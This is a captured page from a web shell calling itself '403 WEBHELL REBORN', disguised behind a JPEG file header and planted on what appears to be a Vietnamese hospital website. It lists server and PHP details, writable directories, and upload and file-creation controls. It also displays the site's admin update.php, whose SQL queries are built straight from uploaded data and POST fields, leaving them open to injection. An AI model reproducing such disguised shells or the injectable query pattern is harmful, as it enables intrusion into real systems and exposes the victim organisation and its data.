ÿØÿà JFIF  ` ` ÿþš 403 WEBHELL REBORN
403 WEBHELL REBORN
Server : Apache/2
System : Linux vps.phamthanh.local 3.10.0-1160.102.1.el7.x86_64 #1 SMP Tue Oct 17 15:42:21 UTC 2023 x86_64
User : benhviencoc7 ( 1008)
PHP Version : 5.6.40
Disable Function : exec,system,passthru,shell_exec,proc_close,proc_open,dl,popen,show_source,posix_kill,posix_mkfifo,posix_getpwuid,posix_setpgid,posix_setsid,posix_setuid,posix_setgid,posix_seteuid,posix_setegid,posix_uname
Directory :  /home/benhviencoc7/domains/benhviendkkvcampha.vn/public_html/adminvn/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

Buat Folder Baru:
Buat File Baru:

Current File : /home/benhviencoc7/domains/benhviendkkvcampha.vn/public_html/////adminvn/update.php
<?php

/*----------------------------------------*\
|             Copyright © C-ILY            | 
|            Phone: 0983.998.994           |
|             Y!m: notepad.html            |
|         Email: truongpv87@gmail.com      |
\*----------------------------------------*/

define('CILY',true);
include('../#includes/config.php');
if(check_log() == true) {
    
    function number1($str){
        $str = preg_replace('|[^0-9]?|U', '', $str);
        return $str;
    }

    $data = @file_get_contents($_FILES['file']['tmp_name']);
    if($data != null){
        $total = 0;
        $start = 0;    

        preg_match_all('/<Row>(.*?)<\/Row>/is', $data, $rows);
        foreach($rows[1] as $row){
            if($start >= $_POST['start']){

                preg_match_all('/<Data ss:Type="[A-Za-z]+?">(.*?)<\/Data>/is', $row, $cell);

                list($check2) = @mysql_fetch_array(@mysql_query("SELECT id FROM cily_products WHERE id = '".$cell[1][$_POST['code']]."'"));
                if($check2 >= 1) {
                     $giahang = ($cell[1][$_POST['giahang']] == 'Không')?'0':$cell[1][$_POST['giahang']];
                     @mysql_query("UPDATE cily_products SET product_name = '".$cell[1][$_POST['price']]."', product_price = '".$cell[1][$_POST['free']]."', product_free = '".$giahang."', product_km = '".($cell[1][$_POST['total']])."' WHERE id = ".$cell[1][$_POST['code']]);

                }else {

                    @mysql_query("INSERT INTO cily_products (product_name, product_price, product_free, product_km, product_time, product_timeup) VALUES ('".$cell[1][$_POST['price']]."', '".$cell[1][$_POST['free']]."', '".$cell[1][$_POST['giahang']]."', '".$cell[1][$_POST['total']]."','" . time() . "','" . time() . "')");
                }
                
                $total ++;
            }
            $start ++;
        }
        header('Location: index.php?m=3&sm=3&update=success&total='.$total);
        echo $total;
    }
    else header('Location: index.php?m=3&sm=3&update=error');
}

else echo "Hacking attempt";

?>

Anon7 - 2021